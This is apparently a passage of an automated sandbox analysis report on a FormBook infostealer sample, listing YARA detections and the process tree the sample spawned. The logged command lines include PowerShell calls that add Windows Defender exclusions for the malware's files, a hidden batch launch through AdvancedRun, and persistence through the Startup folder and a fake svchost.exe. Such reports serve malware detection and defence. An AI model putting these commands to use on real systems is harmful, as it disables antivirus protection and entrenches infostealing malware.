                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000000.507226392.0000000003B13000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000000.507226392.0000000003B13000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                      • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000000.565866416.0000000005120000.00000004.00020000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000000.565866416.0000000005120000.00000004.00020000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000000.401438972.000000000388C000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000000.401438972.000000000388C000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000000.412228109.0000000005120000.00000004.00020000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000000.412228109.0000000005120000.00000004.00020000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000000.435912752.00000000036C9000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000000.435912752.00000000036C9000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000000.407100125.0000000003AB3000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000000.407100125.0000000003AB3000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000000.407100125.0000000003AB3000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                      • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000000.461519073.000000000388C000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000000.461519073.000000000388C000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      Reputation:low

                                                                                      Analysis Process: svchost.exe PID: 4824 Parent PID: 556

                                                                                      General

                                                                                      Start time:08:53:15
                                                                                      Start date:15/09/2021
                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                      Imagebase:0x7ff797770000
                                                                                      File size:51288 bytes
                                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high

                                                                                      Analysis Process: AdvancedRun.exe PID: 5136 Parent PID: 4328

                                                                                      General

                                                                                      Start time:08:53:18
                                                                                      Start date:15/09/2021
                                                                                      Path:C:\Users\user\AppData\Local\Temp\866838ff-f925-41f4-be86-0619ea100a91\AdvancedRun.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:'C:\Users\user\AppData\Local\Temp\866838ff-f925-41f4-be86-0619ea100a91\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\866838ff-f925-41f4-be86-0619ea100a91\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                                                                                      Imagebase:0x400000
                                                                                      File size:91000 bytes
                                                                                      MD5 hash:17FC12902F4769AF3A9271EB4E2DACCE
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:moderate

                                                                                      Analysis Process: AdvancedRun.exe PID: 3228 Parent PID: 5136

                                                                                      General

                                                                                      Start time:08:53:21
                                                                                      Start date:15/09/2021
                                                                                      Path:C:\Users\user\AppData\Local\Temp\866838ff-f925-41f4-be86-0619ea100a91\AdvancedRun.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:'C:\Users\user\AppData\Local\Temp\866838ff-f925-41f4-be86-0619ea100a91\AdvancedRun.exe' /SpecialRun 4101d8 5136
                                                                                      Imagebase:0x400000
                                                                                      File size:91000 bytes
                                                                                      MD5 hash:17FC12902F4769AF3A9271EB4E2DACCE
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:moderate

                                                                                      Analysis Process: svchost.exe PID: 6172 Parent PID: 556

                                                                                      General

                                                                                      Start time:08:53:24
                                                                                      Start date:15/09/2021
                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                      Imagebase:0x7ff797770000
                                                                                      File size:51288 bytes
                                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high

                                                                                      Analysis Process: svchost.exe PID: 6212 Parent PID: 556

                                                                                      General

                                                                                      Start time:08:53:25
                                                                                      Start date:15/09/2021
                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                                                                                      Imagebase:0x7ff797770000
                                                                                      File size:51288 bytes
                                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high

                                                                                      Analysis Process: powershell.exe PID: 6260 Parent PID: 4328

                                                                                      General

                                                                                      Start time:08:53:26
                                                                                      Start date:15/09/2021
                                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\RYhdmjjr94.exe' -Force
                                                                                      Imagebase:0x1110000
                                                                                      File size:430592 bytes
                                                                                      MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:.Net C# or VB.NET
                                                                                      Reputation:high

                                                                                      Analysis Process: svchost.exe PID: 6284 Parent PID: 556

                                                                                      General

                                                                                      Start time:08:53:28
                                                                                      Start date:15/09/2021
                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
                                                                                      Imagebase:0x7ff797770000
                                                                                      File size:51288 bytes
                                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high

                                                                                      Analysis Process: conhost.exe PID: 6380 Parent PID: 6260

                                                                                      General

                                                                                      Start time:08:53:29
                                                                                      Start date:15/09/2021
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff7ecfc0000
                                                                                      File size:625664 bytes
                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language

                                                                                      Analysis Process: powershell.exe PID: 6392 Parent PID: 4328

                                                                                      General

                                                                                      Start time:08:53:30
                                                                                      Start date:15/09/2021
                                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\RYhdmjjr94.exe' -Force
                                                                                      Imagebase:0x1110000
                                                                                      File size:430592 bytes
                                                                                      MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:.Net C# or VB.NET

                                                                                      Analysis Process: svchost.exe PID: 6456 Parent PID: 556

                                                                                      General

                                                                                      Start time:08:53:30
                                                                                      Start date:15/09/2021
                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                                                                                      Imagebase:0x7ff797770000
                                                                                      File size:51288 bytes
                                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language

                                                                                      Analysis Process: conhost.exe PID: 6504 Parent PID: 6392

                                                                                      General

                                                                                      Start time:08:53:31
                                                                                      Start date:15/09/2021
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff7ecfc0000
                                                                                      File size:625664 bytes
                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language

                                                                                      Analysis Process: powershell.exe PID: 6512 Parent PID: 4328

                                                                                      General

                                                                                      Start time:08:53:31
                                                                                      Start date:15/09/2021
                                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe' -Force
                                                                                      Imagebase:0x1110000
                                                                                      File size:430592 bytes
                                                                                      MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:.Net C# or VB.NET

                                                                                      Analysis Process: svchost.exe PID: 6604 Parent PID: 556

                                                                                      General

                                                                                      Start time:08:53:31
                                                                                      Start date:15/09/2021
                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\System32\svchost.exe -k NetworkService -p
                                                                                      Imagebase:0x7ff797770000
                                                                                      File size:51288 bytes
                                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language

                                                                                      Analysis Process: powershell.exe PID: 6688 Parent PID: 4328

                                                                                      General

                                                                                      Start time:08:53:33
                                                                                      Start date:15/09/2021
                                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe' -Force
                                                                                      Imagebase:0x1110000
                                                                                      File size:430592 bytes
                                                                                      MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:.Net C# or VB.NET

                                                                                      Analysis Process: conhost.exe PID: 6700 Parent PID: 6512

                                                                                      General

                                                                                      Start time:08:53:34
                                                                                      Start date:15/09/2021
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff7ecfc0000
                                                                                      File size:625664 bytes
                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language

                                                                                      Analysis Process: conhost.exe PID: 6824 Parent PID: 6688

                                                                                      General

                                                                                      Start time:08:53:35
                                                                                      Start date:15/09/2021
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff7ecfc0000
                                                                                      File size:625664 bytes
                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language

                                                                                      Analysis Process: powershell.exe PID: 6832 Parent PID: 4328

                                                                                      General

                                                                                      Start time:08:53:35
                                                                                      Start date:15/09/2021
                                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\RYhdmjjr94.exe' -Force
                                                                                      Imagebase:0x1110000
                                                                                      File size:430592 bytes
                                                                                      MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:.Net C# or VB.NET

                                                                                      Analysis Process: conhost.exe PID: 6984 Parent PID: 6832

                                                                                      General

                                                                                      Start time:08:53:37
                                                                                      Start date:15/09/2021
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff7ecfc0000
                                                                                      File size:625664 bytes
                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language

                                                                                      Analysis Process: 36C95A71.exe PID: 7004 Parent PID: 4328

                                                                                      General

                                                                                      Start time:08:53:38
                                                                                      Start date:15/09/2021
                                                                                      Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe'
                                                                                      Imagebase:0xb30000
                                                                                      File size:1053624 bytes
                                                                                      MD5 hash:44696D252000850D3EA71D9AE238AEDC
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:.Net C# or VB.NET

                                                                                      Analysis Process: powershell.exe PID: 7148 Parent PID: 4328

                                                                                      General

                                                                                      Start time:08:53:40
                                                                                      Start date:15/09/2021
                                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\2FDD6624\svchost.exe' -Force
                                                                                      Imagebase:0x1110000
                                                                                      File size:430592 bytes
                                                                                      MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:.Net C# or VB.NET

                                                                                      Analysis Process: svchost.exe PID: 7156 Parent PID: 556

                                                                                      General

                                                                                      Start time:08:53:40
                                                                                      Start date:15/09/2021
                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                                                                                      Imagebase:0x7ff797770000
                                                                                      File size:51288 bytes
                                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language

                                                                                      Analysis Process: powershell.exe PID: 1140 Parent PID: 4328

                                                                                      General

                                                                                      Start time:08:53:42
                                                                                      Start date:15/09/2021
                                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\RYhdmjjr94.exe' -Force
                                                                                      Imagebase:0x1110000
                                                                                      File size:430592 bytes
                                                                                      MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:.Net C# or VB.NET

                                                                                      Analysis Process: conhost.exe PID: 4944 Parent PID: 7148

                                                                                      General

                                                                                      Start time:08:53:42
                                                                                      Start date:15/09/2021
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff7ecfc0000
                                                                                      File size:625664 bytes
                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language

                                                                                      Analysis Process: powershell.exe PID: 3688 Parent PID: 4328

                                                                                      General

                                                                                      Start time:08:53:46
                                                                                      Start date:15/09/2021
                                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\2FDD6624\svchost.exe' -Force
                                                                                      Imagebase:0x1110000
                                                                                      File size:430592 bytes
                                                                                      MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:.Net C# or VB.NET

                                                                                      Analysis Process: conhost.exe PID: 1284 Parent PID: 1140

                                                                                      General

                                                                                      Start time:08:53:48
                                                                                      Start date:15/09/2021
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff7ecfc0000
                                                                                      File size:625664 bytes
                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language

                                                                                      Analysis Process: 36C95A71.exe PID: 5628 Parent PID: 3472

                                                                                      General

                                                                                      Start time:08:53:48
                                                                                      Start date:15/09/2021
                                                                                      Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe'
                                                                                      Imagebase:0x1f0000
                                                                                      File size:1053624 bytes
                                                                                      MD5 hash:44696D252000850D3EA71D9AE238AEDC
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:.Net C# or VB.NET

                                                                                      Analysis Process: conhost.exe PID: 6408 Parent PID: 3688

                                                                                      General

                                                                                      Start time:08:53:50
                                                                                      Start date:15/09/2021
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff7ecfc0000
                                                                                      File size:625664 bytes
                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language

                                                                                      Analysis Process: aspnet_compiler.exe PID: 6548 Parent PID: 4328

                                                                                      General

                                                                                      Start time:08:53:59
                                                                                      Start date:15/09/2021
                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                      Imagebase:0x8a0000
                                                                                      File size:55400 bytes
                                                                                      MD5 hash:17CC69238395DF61AAF483BCEF02E7C9
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language

                                                                                      Analysis Process: svchost.exe PID: 6468 Parent PID: 3472

                                                                                      General

                                                                                      Start time:08:54:02
                                                                                      Start date:15/09/2021
                                                                                      Path:C:\Users\Public\Documents\2FDD6624\svchost.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:'C:\Users\Public\Documents\2FDD6624\svchost.exe'
                                                                                      Imagebase:0x330000
                                                                                      File size:1053624 bytes
                                                                                      MD5 hash:44696D252000850D3EA71D9AE238AEDC
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:.Net C# or VB.NET
                                                                                      Antivirus matches:
                                                                                      • Detection: 46%, Virustotal, Browse
                                                                                      • Detection: 23%, Metadefender, Browse
                                                                                      • Detection: 51%, ReversingLabs

                                                                                      Analysis Process: explorer.exe PID: 3472 Parent PID: 6548

                                                                                      General

                                                                                      Start time:08:54:09
                                                                                      Start date:15/09/2021
                                                                                      Path:C:\Windows\explorer.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\Explorer.EXE
                                                                                      Imagebase:0x7ff693d90000
                                                                                      File size:3933184 bytes
                                                                                      MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000025.00000000.601965893.00000000076C0000.00000040.00020000.sdmp, Author: Joe Security
                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000025.00000000.601965893.00000000076C0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000025.00000000.601965893.00000000076C0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000025.00000000.592270922.0000000006791000.00000040.00020000.sdmp, Author: Joe Security
                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000025.00000000.592270922.0000000006791000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000025.00000000.592270922.0000000006791000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000025.00000000.600871078.00000000073C2000.00000040.00020000.sdmp, Author: Joe Security
                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000025.00000000.600871078.00000000073C2000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000025.00000000.600871078.00000000073C2000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000025.00000000.595996658.0000000006CCA000.00000040.00020000.sdmp, Author: Joe Security
                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000025.00000000.595996658.0000000006CCA000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000025.00000000.595996658.0000000006CCA000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000025.00000000.599863307.0000000007292000.00000040.00020000.sdmp, Author: Joe Security
                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000025.00000000.599863307.0000000007292000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000025.00000000.599863307.0000000007292000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000025.00000000.598338320.00000000070EE000.00000040.00020000.sdmp, Author: Joe Security
                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000025.00000000.598338320.00000000070EE000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000025.00000000.598338320.00000000070EE000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000025.00000000.601361941.00000000074C9000.00000040.00020000.sdmp, Author: Joe Security
                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000025.00000000.601361941.00000000074C9000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000025.00000000.601361941.00000000074C9000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group

                                                                                      Analysis Process: svchost.exe PID: 6068 Parent PID: 556

                                                                                      General

                                                                                      Start time:08:54:09
                                                                                      Start date:15/09/2021
                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                                      Imagebase:0x7ff797770000
                                                                                      File size:51288 bytes
                                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language

                                                                                      Analysis Process: WerFault.exe PID: 3000 Parent PID: 6068

                                                                                      General

                                                                                      Start time:08:54:11
                                                                                      Start date:15/09/2021
                                                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 4328 -ip 4328
                                                                                      Imagebase:0x1170000
                                                                                      File size:434592 bytes
                                                                                      MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language

                                                                                      Analysis Process: svchost.exe PID: 6672 Parent PID: 3472

                                                                                      General

                                                                                      Start time:08:54:11
                                                                                      Start date:15/09/2021
                                                                                      Path:C:\Users\Public\Documents\2FDD6624\svchost.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:'C:\Users\Public\Documents\2FDD6624\svchost.exe'
                                                                                      Imagebase:0x670000
                                                                                      File size:1053624 bytes
                                                                                      MD5 hash:44696D252000850D3EA71D9AE238AEDC
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:.Net C# or VB.NET

                                                                                      Analysis Process: svchost.exe PID: 1008 Parent PID: 556

                                                                                      General

                                                                                      Start time:08:54:15
                                                                                      Start date:15/09/2021
                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                      Imagebase:0x7ff797770000
                                                                                      File size:51288 bytes
                                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language

                                                                                      Analysis Process: AdvancedRun.exe PID: 3132 Parent PID: 7004

                                                                                      General

                                                                                      Start time:08:54:19
                                                                                      Start date:15/09/2021
                                                                                      Path:C:\Users\user\AppData\Local\Temp\36029300-7d61-41e1-9521-12c4a6ab3f8e\AdvancedRun.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:'C:\Users\user\AppData\Local\Temp\36029300-7d61-41e1-9521-12c4a6ab3f8e\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\36029300-7d61-41e1-9521-12c4a6ab3f8e\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                                                                                      Imagebase:0x7ff6bbfa0000
                                                                                      File size:91000 bytes
                                                                                      MD5 hash:17FC12902F4769AF3A9271EB4E2DACCE
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Antivirus matches:
                                                                                      • Detection: 0%, Virustotal, Browse
